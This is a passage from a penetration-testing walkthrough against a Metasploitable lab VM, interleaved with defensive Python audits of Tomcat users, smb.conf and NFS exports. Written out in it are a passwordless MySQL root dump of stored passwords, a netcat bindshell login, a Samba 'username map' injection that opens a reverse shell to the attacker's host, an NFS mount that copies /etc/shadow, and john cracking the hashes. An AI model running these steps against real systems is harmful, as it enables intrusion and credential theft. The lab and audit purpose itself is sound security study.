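  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
  <user username="deployer" password="Xk9#2pLq!vR4" roles="manager-script"/>
</tomcat-users>
"""

# Pairs the login scanner above tried, plus self-named ones; extend from your own wordlist.
DEFAULT_CREDS = {("tomcat", "tomcat"), ("admin", "admin"), ("both", "tomcat"),
                 ("role1", "tomcat"), ("admin", "tomcat"), ("tomcat", "s3cret")}
# Roles that grant Manager/Host-Manager access (Tomcat 5.5/6 names and 7+ names).
MANAGER_ROLES = {"manager", "admin", "manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}


def parse_tomcat_users(xml_text):
    """Return [{username, password, roles}] for every <user> element."""
    root = ET.fromstring(xml_text)
    users = []
    for u in root.iter("user"):
        # Tomcat accepts both 'username' and the older 'name' attribute.
        name = u.get("username") or u.get("name") or ""
        roles = {r.strip() for r in u.get("roles", "").split(",") if r.strip()}
        users.append({"username": name, "password": u.get("password", ""), "roles": roles})
    return users


def audit_tomcat_users(xml_text):
    """Return (username, severity, problems) for each account worth fixing."""
    findings = []
    for u in parse_tomcat_users(xml_text):
        cred = None
        if (u["username"], u["password"]) in DEFAULT_CREDS:
            cred = "default credential pair"
        elif u["password"] == u["username"]:
            cred = "password equals username"
        elif len(u["password"]) < 12:
            cred = "password shorter than 12 characters"
        privileged = sorted(u["roles"] & MANAGER_ROLES)
        problems = []
        if cred:
            problems.append(cred)
        if privileged:
            problems.append("holds manager/admin roles: " + ", ".join(privileged))
        if cred and privileged:
            severity = "critical"   # exactly the tomcat/tomcat case used above
        elif cred:
            severity = "high"
        elif privileged:
            severity = "medium"     # strong password, but review who needs the role
        else:
            continue
        findings.append((u["username"], severity, problems))
    return findings


if __name__ == "__main__":
    for name, severity, problems in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("%-9s %-8s %s" % (name, severity, "; ".join(problems)))
```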
Let's continue with port 3306 from the open ports in our Nmap scan. Since 3306 is the MySQL port, let's first try connecting as the MySQL root user.
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
root@kali:~# mysql -u root -p -h 192.168.1.21
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
Bingo. A default MySQL installation allows console access with an empty password but does not allow remote connections. Since this is a special-purpose machine, this has been left open too.
Now we can proceed with MySQL commands. Let's see what we find.
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.001 sec)
MySQL [(none)]> use owasp10;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [owasp10]> show tables;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts          |
| blogs_table       |
| captured_data     |
| credit_cards      |
| hitlog            |
| pen_test_tools    |
+-------------------+
6 rows in set (0.001 sec)
MySQL [owasp10]> select * from accounts;
+-----+----------+--------------+-----------------------------+----------+
| cid | username | password     | mysignature                 | is_admin |
+-----+----------+--------------+-----------------------------+----------+
|   1 | admin    | adminpass    | Monkey!                     | TRUE     |
|   2 | adrian   | somepassword | Zombie Films Rock!          | TRUE     |
|   3 | john     | monkey       | I like the smell of confunk | FALSE    |
|   4 | jeremy   | password     | d1373 1337 speak            | FALSE    |
|   5 | bryce    | password     | I Love SANS                 | FALSE    |
|   6 | samurai  | samurai      | Carving Fools               | FALSE    |
|   7 | jim      | password     | Jim Rome is Burning         | FALSE    |
|   8 | bobby    | password     | Hank is my dad              | FALSE    |
|   9 | simba    | password     | I am a cat                  | FALSE    |
|  10 | dreveil  | password     | Preparation H               | FALSE    |
|  11 | scotty   | password     | Scotty Do                   | FALSE    |
|  12 | cal      | password     | Go Wildcats                 | FALSE    |
|  13 | john     | password     | Do the Duggie!              | FALSE    |
|  14 | kevin    | 42           | Doug Adams rocks            | FALSE    |
|  15 | dave     | set          | Bet on S.E.T. FTW           | FALSE    |
|  16 | ed       | pentest      | Commandline KungFu anyone?  | FALSE    |
+-----+----------+--------------+-----------------------------+----------+
16 rows in set (0.002 sec)
MySQL [owasp10]>
As you can see, we obtained all the usernames and passwords.
In our nmap scan results, port 1524 was described as "bindshell Metasploitable root shell". Perhaps the easiest shell we'll get is through this port.
All we need to do is:
root@kali:~# nc 192.168.1.21 1524
root@metasploitable:/# whoami
root
root@metasploitable:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:/#
Too easy, isn't it? Sometimes you need to think simple.
We continue with NFS.
2049/tcp open nfs 2-4 (RPC #100003)
Since we're going to try to exploit the vulnerability via NFS, we can start by listing the shares on the target machine and their permissions.
root@kali:~# smbmap -H 192.168.1.21
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.168.1.21...
[+] IP: 192.168.1.21:445 Name: 192.168.1.21
Disk Permissions
—- ———–
print$ NO ACCESS
tmp READ, WRITE
opt NO ACCESS
IPC$ NO ACCESS
ADMIN$ NO ACCESS
root@kali:~#
Great, there is a share with read and write enabled for the /tmp directory. Let's mount it on our own machine then.
root@kali:~# smbclient //192.168.1.21/tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
Let's poke around a bit to see what we can do.
It looks like we're locked into the directory. Can we get anywhere with the commands shown when we type help?
I'll try running netcat with the logon command and getting a shell by opening a listener on my own machine.
To do this:
First I run the nc -nvlp 6666 command on my own machine.
Then, in the smb session on the Metasploitable machine, I run netcat as follows and bypass the login.
root@kali:~# smbclient //192.168.1.21/tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc 192.168.1.26 6666 -e /bin/bash`"
Password:
I switch to the terminal where the listener is open and see that I'm in.
To jump to bash, I use the following command.
python -c 'import pty; pty.spawn("/bin/sh")'
We've taken over the target through one more vulnerability.
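Added as a defender's check (not code from the original post) for both Samba weaknesses used above: the "username map script" hook the usermap_script module relies on, and the guest-writable tmp share that smbmap reported. The smb.conf below is constructed to resemble such a setup, not the VM's actual file; the script path in it is a placeholder.

```python
"""Audit a Samba smb.conf for a 'username map script' hook and for shares that
anonymous (guest) users can write to."""
import configparser
import io

# Constructed smb.conf resembling a permissive lab setup; not Metasploitable's file.
# The username map script path is a placeholder.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba
   security = share
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = bad user

[print$]
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes

[tmp]
   comment = scratch space
   path = /tmp
   writable = yes
   guest ok = yes
   browseable = yes

[opt]
   path = /opt
   read only = yes
   guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1"}
FALSE_VALUES = {"no", "false", "0"}


def load_smb_conf(text):
    """smb.conf is INI-like; interpolation is off because values may contain '%'."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_file(io.StringIO(text))
    return cp


def share_is_writable(section):
    """Samba treats 'writable = yes', 'writeable = yes' or 'read only = no' as writable."""
    if section.get("read only", "").strip().lower() in FALSE_VALUES:
        return True
    for key in ("writable", "writeable"):
        if section.get(key, "").strip().lower() in TRUE_VALUES:
            return True
    return False


def share_allows_guest(section):
    """'guest ok' and its synonym 'public' both enable anonymous access."""
    for key in ("guest ok", "public"):
        if section.get(key, "no").strip().lower() in TRUE_VALUES:
            return True
    return False


def audit_smb_conf(text):
    """Return a list of (section, finding) pairs; an empty list means nothing flagged."""
    cp = load_smb_conf(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    if g.get("username map script"):
        findings.append(("global", "username map script is set: %s" % g["username map script"]))
    if g.get("security", "").strip().lower() == "share":
        findings.append(("global", "security = share (share-level auth, removed in Samba 4)"))
    for name in cp.sections():
        if name == "global":
            continue
        s = cp[name]
        path = s.get("path", "?")
        if share_allows_guest(s) and share_is_writable(s):
            findings.append((name, "anonymous (guest) write access to %s" % path))
        elif share_allows_guest(s):
            findings.append((name, "anonymous (guest) read access to %s" % path))
    return findings


if __name__ == "__main__":
    for section, finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print("[%s] %s" % (section, finding))
```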
root@kali:~# mount -t nfs 192.168.1.21:/ /tmp/ceyhun
root@kali:~# cd /tmp/ceyhun/
root@kali:/tmp/ceyhun# ls -la
total 104
drwxr-xr-x 21 root root 4096 May 20 2012 .
drwxrwxrwt 21 root root 4096 Oct 31 16:53 ..
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 3 root root 4096 Apr 28 2010 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 2 root root 4096 May 20 2012 dev
drwxr-xr-x 95 root root 4096 Oct 31 14:10 etc
drwxr-xr-x 6 root root 4096 Apr 16 2010 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx------ 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw——- 1 root root 7984 Oct 31 14:07 nohup.out
drwxr-xr-x 2 root root 4096 Mar 16 2010 opt
dr-xr-xr-x 2 root root 4096 Apr 28 2010 proc
drwxr-xr-x 13 root root 4096 Oct 31 14:07 root
drwxr-xr-x 2 root root 4096 May 13 2012 sbin
drwxr-xr-x 2 root root 4096 Mar 16 2010 srv
drwxr-xr-x 2 root root 4096 Apr 28 2010 sys
drwxrwxrwt 5 root root 4096 Oct 31 16:37 tmp
drwxr-xr-x 12 root root 4096 Apr 28 2010 usr
drwxr-xr-x 15 root root 4096 May 20 2012 var
lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
root@kali:/tmp/ceyhun# cp /tmp/ceyhun/etc/shadow /tmp/passwd-shadow-merged/
root@kali:/tmp/ceyhun# cp /tmp/ceyhun/etc/passwd /tmp/passwd-shadow-merged/
root@kali:/tmp/ceyhun# cd ../passwd-shadow-merged/
root@kali:/tmp/passwd-shadow-merged# unshadow passwd shadow > merged
root@kali:/tmp/passwd-shadow-merged# john merged
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
user (user)
postgres (postgres)
Warning: Only 20 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 32 candidates buffered for the current salt, minimum 48 needed for performance.
msfadmin (msfadmin)
Warning: Only 21 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 33 candidates buffered for the current salt, minimum 48 needed for performance.
service (service)
Warning: Only 30 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 37 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 38 candidates buffered for the current salt, minimum 48 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 20 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 21 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 10 candidates buffered for the current salt, minimum 48 needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings, enable 'RelaxKPCWarningCheck' in john.conf
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
123456789 (klog)
batman (sys)
Proceeding with incremental:ASCII
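Added as a defender's check (not from the original post): mounting 192.168.1.21:/ from another host and copying /etc/shadow out of it is only possible because the root filesystem is exported to every client without root squashing. The /etc/exports below is constructed; its first line is what that mount implies, the others are foils.

```python
"""Audit /etc/exports for what made the NFS step above possible: the root
filesystem exported to every client, writable, with root squashing disabled."""
import re

# Constructed /etc/exports. The first entry reproduces what the successful
# mount of 192.168.1.21:/ above implies; the other lines are foils.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/            *(rw,no_root_squash)
/srv/public  192.168.1.0/24(ro,root_squash,sync)
/home/build  10.0.0.5(rw,sync) 10.0.0.6(rw,no_root_squash)
"""

# client spec: host, optionally followed by (opt,opt,...)
SPEC_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return [{path, host, opts}] with one entry per client spec. A path with
    no client list is exported to everyone, which exportfs treats as '*'."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:] or ["*"]
        for spec in specs:
            m = SPEC_RE.match(spec)
            host = m.group(1) or "*"
            opts = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
            exports.append({"path": path, "host": host, "opts": opts})
    return exports


def is_wildcard(host):
    """'*' , '*.example.com' style globs and the whole IPv4 space count as 'anyone'."""
    return host in {"*", "0.0.0.0/0"} or host.startswith("*")


def audit_exports(text):
    """Return (path, host, problems) for each export a defender should fix.
    'rw' on its own is not reported; it is only a problem combined with a
    wildcard client, a root export or no_root_squash."""
    findings = []
    for e in parse_exports(text):
        problems = []
        if is_wildcard(e["host"]):
            problems.append("exported to any client")
        if e["path"] == "/":
            problems.append("entire root filesystem exported")
        if "no_root_squash" in e["opts"]:
            problems.append("no_root_squash: remote uid 0 is root on the export")
        if "rw" in e["opts"] and problems:
            problems.append("writable")
        if problems:
            findings.append((e["path"], e["host"], problems))
    return findings


if __name__ == "__main__":
    for path, host, problems in audit_exports(SAMPLE_EXPORTS):
        print("%s -> %s: %s" % (path, host, "; ".join(problems)))
```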